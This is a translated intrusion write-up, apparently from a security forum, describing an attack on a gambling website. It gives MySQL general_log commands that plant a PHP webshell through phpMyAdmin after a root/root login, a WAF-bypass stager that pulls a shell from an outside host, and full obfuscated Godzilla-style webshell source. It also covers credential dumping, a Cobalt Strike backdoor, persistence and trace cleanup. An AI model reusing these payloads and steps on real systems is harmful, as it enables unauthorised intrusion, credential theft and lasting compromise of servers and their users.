Title: Simply bypass waf to get the gambling website

Determine the target

Collect information

x.x.x.x first, the regular test methods are upset, directory scanning, port scanning, js files, middleware, fingerprint recognition, anyway, all of them should be on.

Add a path at will and report an error. When I see this interface, I instantly have a thought.

Why do I say that? Because I have encountered such a website before that it reports an error. This is a php integration environment called upupw, which is the same as phpstudy.

upupw -- pmd

phpstudy -- phpmyadmin

Breakthrough Point

This integrated environment package also has a phpinfo page, which is connected to the database management interface

u.php

Test the weak password

root/root

After the connection is successful, you can see the page of phpinfo

OK Now the problem becomes phpmyadmin to get shell

getshell

Three steps to get the shell

set global general_log='on';

SET global general_log_file='D:/xxxx/WWW/cmd.php';

SELECT '?php assert($_POST['cmd']);';The page is stuck in execution when the third step is executed. No response. I feel wrong in an instant, there may be a waf

Try changing to avoid killing horses, write it in txt to see if it succeeds

No problem, just write the php file directly

You can write and connect to the shell directly

Sure enough, there is a waf. I felt it when I was writing it. I couldn't help but kill the shell, and the SQL statement could not be executed.

Bypass waf

I didn’t know what the hell is waf, try downloading the file

In order to avoid intercepting php code waf, the script I downloaded remotely here is to use JavaScript to transliterate php

SET global general_log_file='C:/Users/Administrator/Desktop/UPUPW_AP5.5_64/htdocs/11.php';

SELECT 'script language='php' $a='http://x.x.x.x:81/shell.txt';$b='file'.'_g'.'et_'.'contents';$b=$b($a);file_put_contents('shell.php',$b); /script'

Visiting 11.php will generate shell.php

The shell here also uses Godzilla's kill-free shell

?php

session_start();

@set_time_limit(0);

@error_reporting(0);

function E($D,$K){

for($i=0;$itrlen($D);$i++) {

$D[$i]=$D[$i]^$K[$i+115];

}

return $D;

}

function Q($D){

return base64_encode($D);

}

function O($D){

return base64_decode($D);

}

$P='pass';

$V='payload';

$T='3c6e0b8a9c15224a';

if (isset($_POST[$P])){

$F=O(E(O($_POST[$P]),$T));

if (isset($_SESSION[$V])){

$L=$_SESSION[$V];

$A=explode('|',$L);

class C{public function nvoke($p) {eval($p.'');}}

$R=new C();

$R-nvoke($A[0]);

echo substr(md5($P.$T),0,16);

echo Q(E(@run($F),$T));

echo substr(md5($P.$T),16);

}else{

$_SESSION[$V]=$F;

}

}

Try so many times

There is no waf process in the process

Permission is system

Dissource code

Upload password grabbing tool, directly obtain management password, log on to the server

Leave the back door and clean up the traces

Leave a few more backdoors, if they are deleted

There are so many machines in this network segment

Source Code

Open the source code and finds that waf is 360webscan

Summary: 1. Information collection, directory scanning, port scanning, JS file sensitive file scanning, middleware scanning, fingerprint recognition without any available information 2. By adding an error path after the URL, the error message "To find, Fahai doesn't understand love, the page cannot be displayed", the system is a php integrated environment upupw3. In this environment, a file called phpinfo is u.php. Enter the weak password root/root, and you can directly enter phpmyadmin. At the same time, you can view the information of phpinfo. The absolute path exposed to the website is D:/xxxx/WWW/UPUPW_AP5.5_64/htdocs/4.phpmyadmin obtains shellset global general_log='on';SET global general_log_file='D:/xxxx/WWW/UPUPW_AP5.5_64/htdocs/cmd.php';SELECT '?php assert($_POST['cmd']);';5. You can write a sentence directly, but connect to the shell and intercepted by WAF 6. The script downloaded remotely uses JavaScript to transcribe php bypass WAF(360webscan)SET global general_log_file='D:/xxxx/WWW/UPUPW_AP5.5_64/htdocs/11.php';SELECT 'script language='php' $a='http://x.x.x.x:81/shell.txt';$b='file'.'_g'.'et_'.'contents';$b=$b($a);file_put_contents('shell.php',$b); /script'7. Accessing 11.php will generate shell.phpshell.txt:php session_start(); @set_time_limit(0); @error_reporting(0); function E($D,$K){ for($i=0;$istrlen($D);$i++) { $D[$i]=$D[$i]^$K[$i+115]; } return $D; } function Q($D){ return base64_encode($D); } function O($D){ return base64_decode($D); } $P='pass'; $V='payload'; $T='3c6e0b8a9c15224a'; if (isset($_POST[$P])){ $F=O(E(O($_POST[$P]),$T)); if (isset($_SESSION[$V])){ $L=$_SESSION[$V]; $A=explode('|',$L); class C{public function nvoke($p) {eval($p.'');}} $R=new C(); $R-nvoke($A[0]); echo substr(md5($P.$T),0,16); echo Q(E(@run($F),$T)); echo substr(md5($P.$T),16); }else{ $_SESSION[$V]=$F; } }8. Connect the shell through Grass, then check the process tasklist, there is no antivirus software, view the permission whoami, is the system permission 9. Upload the hash to grab the local password, which can crawl the Windows local username and password 10. Upload the generated backdoor file of Cs and execute it. 11. Download the source code and find the original link of 360webscan used by WAF: https://xz.aliyun.com/t/9181